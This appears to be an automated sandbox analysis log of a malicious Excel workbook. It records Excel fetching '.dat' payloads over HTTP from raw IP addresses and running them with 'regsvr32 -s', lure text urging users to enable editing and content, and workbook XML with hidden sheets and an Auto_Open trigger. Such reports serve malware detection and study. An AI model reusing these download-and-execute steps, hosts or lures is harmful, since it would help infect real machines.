Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\Post.storg, CommandLine: regsvr32 -s ..\Post.storg, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2352, ProcessCommandLine: regsvr32 -s ..\Post.storg, ProcessId: 2416 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe |
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 190.14.37.134:80 |
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 190.14.37.134:80 |
Source: Joe Sandbox View | IP Address: 51.89.115.124 51.89.115.124 |
Source: global traffic | HTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.134Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.124Connection: Keep-Alive |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.196.25 |
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.196.25 |
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.196.25 |
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.196.25 |
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.196.25 |
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.196.25 |
Source: unknown | TCP traffic detected without corresponding DNS query: 51.89.115.124 |
Source: unknown | TCP traffic detected without corresponding DNS query: 51.89.115.124 |
Source: unknown | TCP traffic detected without corresponding DNS query: 51.89.115.124 |
Source: unknown | TCP traffic detected without corresponding DNS query: 51.89.115.124 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 51.89.115.124 |
Source: unknown | TCP traffic detected without corresponding DNS query: 51.89.115.124 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.134 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC5BF66.tif | Jump to behavior |
Source: global traffic | HTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.134Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /44356.3971392361.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.124Connection: Keep-Alive |
Source: regsvr32.exe, 00000003.00000002.2206688614.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2207736998.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2208486859.0000000001CC0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll |
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above 19 Once you have enabled editing, please click En |
Source: Screenshot number: 4 | Screenshot OCR: Enable Content button from the yellow bar above 20 21 22 23 24 25 26 27 28 29 30 31 32 |
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl |
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content button from the yellow bar above |
Source: workbook.xml | Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{34C063CF-955E-4ACE-9D4C-9A051EAF3AFA}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" state="hidden" r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmln |